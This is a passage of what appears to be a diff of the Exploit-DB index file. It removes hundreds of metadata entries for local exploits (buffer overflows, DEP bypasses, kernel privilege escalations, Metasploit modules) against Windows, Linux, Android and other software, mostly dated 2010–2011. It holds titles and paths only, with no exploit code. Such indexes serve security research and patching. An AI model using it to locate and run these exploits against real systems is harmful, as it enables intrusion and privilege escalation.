-15730,exploits/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow (SEH)",2010-12-12,"James Fitts",windows,local, -15747,exploits/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Local Buffer Overflow",2010-12-16,xsploitedsec,windows,local, -15751,exploits/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Local Buffer Overflow (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local, -15761,exploits/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 < 1.2.0.4 - Local Privilege Escalation",2010-12-17,MJ0011,windows,local, -15762,exploits/windows/local/15762.txt,"NProtect Anti-Virus 2007 < 2010.5.11.1 - Local Privilege Escalation",2010-12-17,MJ0011,windows,local, -15763,exploits/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 < 5.0.1.2 - Local Privilege Escalation",2010-12-17,MJ0011,windows,local, -15764,exploits/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 < 2008.8.1.1 - Local Privilege Escalation",2010-12-17,MJ0011,windows,local, -15774,exploits/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local, -15782,exploits/windows/local/15782.pl,"Word Splash Pro 9.5 - Local Buffer Overflow",2010-12-20,h1ch4m,windows,local, -15785,exploits/windows/local/15785.py,"MP3 CD Converter Professional - Local Buffer Overflow (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local, -15855,exploits/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' Local Overflow (SEH)",2010-12-29,"Abhishek Lyall",windows,local, -15895,exploits/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local, -15888,exploits/windows/local/15888.c,"Bywifi 2.8.1 - Local Stack Buffer Overflow",2011-01-01,anonymous,windows,local, -15901,exploits/windows/local/15901.py,"Music Animation Machine MIDI Player - Local Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local, -15916,exploits/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local, -15919,exploits/windows/local/15919.pl,"Enzip 3.00 - Local Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local, -15934,exploits/windows/local/15934.py,"BS.Player 2.57 - Local Buffer Overflow (SEH Unicode)",2011-01-07,"C4SS!0 G0M3S",windows,local, -15936,exploits/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local, -15941,exploits/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow (SEH)",2011-01-08,fdiskyou,windows,local, -15944,exploits/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local, -15962,exploits/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation",2011-01-10,peri.carding,solaris,local, -15972,exploits/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM",2011-01-11,mu-b,windows,local, -16264,exploits/windows/local/16264.pl,"Magic Music Editor - Local Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local, -15975,exploits/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Local Overflow (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local, -15985,exploits/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local, -15994,exploits/windows/local/15994.rb,"eXtremeMP3 Player - Local Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local, -16009,exploits/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Local Buffer Overflow",2011-01-18,h1ch4m,windows,local, -17210,exploits/windows/local/17210.rb,"eZip Wizard 3.0 - Local Stack Buffer Overflow (Metasploit)",2011-04-25,Metasploit,windows,local, -16024,exploits/windows/local/16024.txt,"Microsoft Fax - Cover Page Editor 5.2.3790.3959 Double-Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local, -16070,exploits/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX Buffer Overflow (SEH)",2011-01-28,Acidgen,windows,local, -16071,exploits/windows/local/16071.txt,"Microsoft Internet Explorer - MHTML Protocol Handler Cross-Site Scripting",2011-01-29,80vul,windows,local, -16072,exploits/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' File Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local, -16073,exploits/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Local Buffer Overflow (SEH)",2011-01-29,m0nna,windows,local, -16083,exploits/windows/local/16083.rb,"NetZip - Classic Buffer Overflow (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local, -16085,exploits/windows/local/16085.py,"AOL 9.5 - '.rtx' Local Buffer Overflow",2011-01-31,sup3r,windows,local, -16086,exploits/linux/local/16086.txt,"OpenVAS Manager - Command Injection",2011-01-31,"Tim Brown",linux,local, -16092,exploits/windows/local/16092.py,"CodeBlocks 8.02 - 'cbp' Local Buffer Overflow",2011-02-01,sup3r,windows,local, -16098,exploits/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local, -16099,exploits/android/local/16099.c,"Google Android 1.x/2.x - Local Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local, -16107,exploits/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Local Buffer Overflow",2011-02-03,sickness,windows,local, -16119,exploits/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak",2011-02-06,kingcope,freebsd,local, -16132,exploits/windows/local/16132.html,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local, -16133,exploits/windows/local/16133.html,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local, -16138,exploits/windows/local/16138.c,"DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM",2011-02-09,mu-b,windows,local, -16141,exploits/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local, -16153,exploits/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Local Buffer Overflow",2011-02-11,sickness,windows,local, -16162,exploits/windows/local/16162.pl,"CuteZip 2.1 - Local Buffer Overflow",2011-02-12,"C4SS!0 G0M3S",windows,local, -16169,exploits/windows/local/16169.py,"Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local, -16173,exploits/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local, -16253,exploits/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Local Buffer Overflow",2011-02-27,sickness,windows,local, -16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local, -41804,exploits/multiple/local/41804.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local, -40435,exploits/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Local Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local, -16503,exploits/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local, -16504,exploits/windows/local/16504.rb,"Adobe - 'util.printf()' Local Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local, -16531,exploits/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local, -16546,exploits/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,local, -16556,exploits/windows/local/16556.rb,"XMPlay 3.3.0.4 - '.ASX' Filename Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local, -16562,exploits/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local, -16589,exploits/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local, -16593,exploits/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local, -41786,exploits/linux/local/41786.rb,"Bluecoat ASG 6.6/CAS 1.3 - Local Privilege Escalation (Metasploit)",2017-04-03,"Chris Hebert",linux,local, -16606,exploits/windows/local/16606.rb,"Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local, -16614,exploits/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,windows,local, -16615,exploits/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,windows,local, -16617,exploits/windows/local/16617.rb,"VUPlayer - '.m3u' Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16618,exploits/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16619,exploits/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Local Stack Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16621,exploits/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local, -16622,exploits/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16623,exploits/windows/local/16623.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16624,exploits/windows/local/16624.rb,"Adobe - 'util.printf()' Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16625,exploits/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)",2010-09-25,Metasploit,windows,local, -16626,exploits/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,windows,local, -16627,exploits/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local, -16628,exploits/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16629,exploits/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local, -16631,exploits/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local, -16632,exploits/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16633,exploits/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16634,exploits/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16636,exploits/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16637,exploits/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local, -16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16642,exploits/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Local Buffer Overflow (Metasploit) (2)",2010-11-11,Metasploit,windows,local, -16643,exploits/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16644,exploits/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Local Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local, -16645,exploits/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16646,exploits/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local, -16648,exploits/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16651,exploits/windows/local/16651.rb,"AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16652,exploits/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16653,exploits/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local, -16654,exploits/windows/local/16654.rb,"Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,windows,local, -16655,exploits/windows/local/16655.rb,"ProShow Gold 4.0.2549 - '.psh' Local Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16656,exploits/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer - Local Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local, -16658,exploits/windows/local/16658.rb,"VUPlayer - '.cue' Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16659,exploits/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,aix,local, -16660,exploits/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)",2011-02-08,Metasploit,windows,local, -16662,exploits/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16663,exploits/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16664,exploits/windows/local/16664.rb,"gAlan 0.2.1 - Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16665,exploits/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)",2010-09-25,Metasploit,windows,local, -16666,exploits/windows/local/16666.rb,"UltraISO - '.CCD' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local, -16667,exploits/windows/local/16667.rb,"Adobe Flash Player - 'Button' Arbitrary Code Execution (Metasploit)",2010-11-01,Metasploit,windows,local, -16668,exploits/windows/local/16668.rb,"BACnet OPC Client - Local Buffer Overflow (Metasploit) (2)",2010-11-14,Metasploit,windows,local, -16669,exploits/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16670,exploits/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16671,exploits/windows/local/16671.rb,"Adobe PDF - Embedded EXE Social Engineering (Metasploit)",2010-12-16,Metasploit,windows,local, -16672,exploits/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16673,exploits/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16674,exploits/windows/local/16674.rb,"Adobe - 'Collab.collectEmailInfo()' Local Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local, -16677,exploits/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local, -16678,exploits/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local, -16679,exploits/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local, -16680,exploits/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Local Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local, -16681,exploits/windows/local/16681.rb,"Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16682,exploits/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript) (Metasploit)",2010-12-16,Metasploit,windows,local, -16683,exploits/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local, -16684,exploits/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local, -16686,exploits/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local, -16687,exploits/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local, -16688,exploits/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local, -16940,exploits/windows/local/16940.c,".NET Runtime Optimization Service - Local Privilege Escalation",2011-03-08,XenoMuta,windows,local, -16942,exploits/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Local Buffer Overflow",2011-03-08,KedAns-Dz,windows,local, -16951,exploits/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Privilege Escalation",2011-03-10,zx2c4,bsd,local, -16965,exploits/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow",2011-03-12,"C4SS!0 G0M3S",windows,local, -16971,exploits/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Local Buffer Overflow",2011-03-14,Rh0,windows,local, -16976,exploits/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Local Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local, -16977,exploits/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Local Buffer Overflow",2011-03-14,h1ch4m,windows,local, -16978,exploits/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,windows,local, -16991,exploits/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local, -16999,exploits/windows/local/16999.rb,"POP Peeper 3.7 - Local Overflow (SEH)",2011-03-18,"Anastasios Monachos",windows,local, -17001,exploits/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Local Buffer Overflow",2011-03-18,Rh0,windows,local, -17012,exploits/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Local Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local, -17013,exploits/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Local Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",windows,local, -17064,exploits/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local Buffer Overflow (SEH)",2011-03-29,Dr_IDE,windows,local, -17083,exploits/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local, -17086,exploits/windows/local/17086.pl,"Word List Builder - Local Buffer Overflow (SEH)",2011-04-01,h1ch4m,windows,local, -17124,exploits/windows/local/17124.pl,"MPlayer (r33064 Lite) - Local Buffer Overflow (ROP)",2011-04-06,Nate_M,windows,local, -17196,exploits/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - 'ElonFmt.ocx' pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local, -17144,exploits/windows/local/17144.pl,"MikeyZip 1.1 - '.zip' Local Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local, -17147,exploits/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local, -17150,exploits/windows/local/17150.rb,"AOL Desktop 9.6 - RTX Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,local, -17153,exploits/windows/local/17153.rb,"VeryTools VideoSpirit Pro 1.70 - '.visprj' Local Buffer Overflow (Metasploit)",2011-04-11,Metasploit,windows,local, -17157,exploits/windows/local/17157.py,"Wordtrainer 3.0 - '.ord' Local Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",windows,local, -17158,exploits/windows/local/17158.txt,"Microsoft HTML Help 6.1 - Local Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local, -17166,exploits/windows/local/17166.py,"PlaylistMaker 1.5 - '.txt' Local Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",windows,local, -17169,exploits/bsd/local/17169.pl,"NEdit 5.5 - Format String",2011-04-14,Tosh,bsd,local, -17171,exploits/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Local Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local, -17177,exploits/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local, -17185,exploits/windows/local/17185.py,"Wireshark 1.4.1 < 1.4.4 - Local Overflow (SEH)",2011-04-18,sickness,windows,local, -17186,exploits/windows/local/17186.rb,"Wireshark 1.4.4 - 'packet-dect.c' Local Stack Buffer Overflow (Metasploit) (1)",2011-04-19,Metasploit,windows,local, -17217,exploits/windows/local/17217.py,"Subtitle Processor 7.7.1 - Local Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",windows,local, -17223,exploits/windows/local/17223.pl,"NetOp Remote Control 8.0/9.1/9.2/9.5 - Local Buffer Overflow",2011-04-28,chap0,windows,local, -17225,exploits/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,windows,local, -17229,exploits/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Local Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,windows,local, -17230,exploits/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Local Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,windows,local, -17317,exploits/windows/local/17317.rb,"VisiWave - '.VWR' File Parsing Trusted Pointer (Metasploit)",2011-05-23,Metasploit,windows,local, -17318,exploits/multiple/local/17318.php,"PHP 5.3.5 - 'socket_connect()' Local Buffer Overflow",2011-05-25,"Marek Kroemeke",multiple,local, -17270,exploits/windows/local/17270.pl,"Chasys Media Player 2.0 - Local Buffer Overflow (SEH)",2011-05-11,h1ch4m,windows,local, -17277,exploits/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local, -17275,exploits/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local, -17294,exploits/windows/local/17294.py,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow",2011-05-16,sinfulsecurity,windows,local, -17302,exploits/windows/local/17302.py,"Sonique 1.96 - '.m3u' Local Buffer Overflow",2011-05-17,sinfulsecurity,windows,local, -17306,exploits/windows/local/17306.pl,"SpongeBob SquarePants Typing - Local Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local, -17313,exploits/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Local Stack Buffer Overflow (Metasploit)",2011-05-22,Metasploit,windows,local, -17329,exploits/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Local Stack Buffer Overflow (Without EggHunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local, -17362,exploits/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous",windows,local, -17364,exploits/windows/local/17364.py,"The KMPlayer 3.0.0.1440 (Windows XP SP3) - '.mp3' File Buffer Overflow (DEP Bypass)",2011-06-06,"dookie & ronin",windows,local, -17383,exploits/windows/local/17383.py,"The KMPlayer 3.0.0.1440 (Windows 7) - '.mp3' Local Buffer Overflow (ASLR Bypass)",2011-06-11,xsploitedsec,windows,local, -17391,exploits/linux/local/17391.c,"Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local, -17441,exploits/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Local Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local, -17449,exploits/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Local Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",windows,local, -17451,exploits/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll .DXF' File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local, -17459,exploits/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,windows,local, -17473,exploits/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion",2011-07-03,Snake,windows,local, -17474,exploits/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local, -17486,exploits/multiple/local/17486.php,"PHP 5.3.6 - Local Buffer Overflow (ROP) (PoC)",2011-07-04,"Jonathan Salwan",multiple,local, -17488,exploits/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)",2011-07-04,extraexploit,windows,local, -17489,exploits/windows/local/17489.rb,"Word List Builder 1.0 - Local Buffer Overflow (Metasploit)",2011-07-04,"James Fitts",windows,local, -17492,exploits/windows/local/17492.rb,"Wordtrainer 3.0 - '.ord' Local Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",windows,local, -17499,exploits/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local, -17502,exploits/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,windows,local, -17511,exploits/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Local Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local, -40085,exploits/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local, -17561,exploits/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local, -17563,exploits/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)",2011-07-23,"C4SS!0 G0M3S",windows,local, -17565,exploits/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Local Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 & h1ch4m",windows,local, -17600,exploits/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 & h1ch4m",windows,local, -17604,exploits/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local, -17605,exploits/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local, -17607,exploits/windows/local/17607.rb,"FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local, -17611,exploits/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow",2011-08-05,ZadYree,linux,local, -17634,exploits/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass",2011-08-07,"C4SS!0 G0M3S",windows,local, -17647,exploits/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local, -17654,exploits/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass",2011-08-11,"C4SS!0 G0M3S",windows,local, -17665,exploits/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - 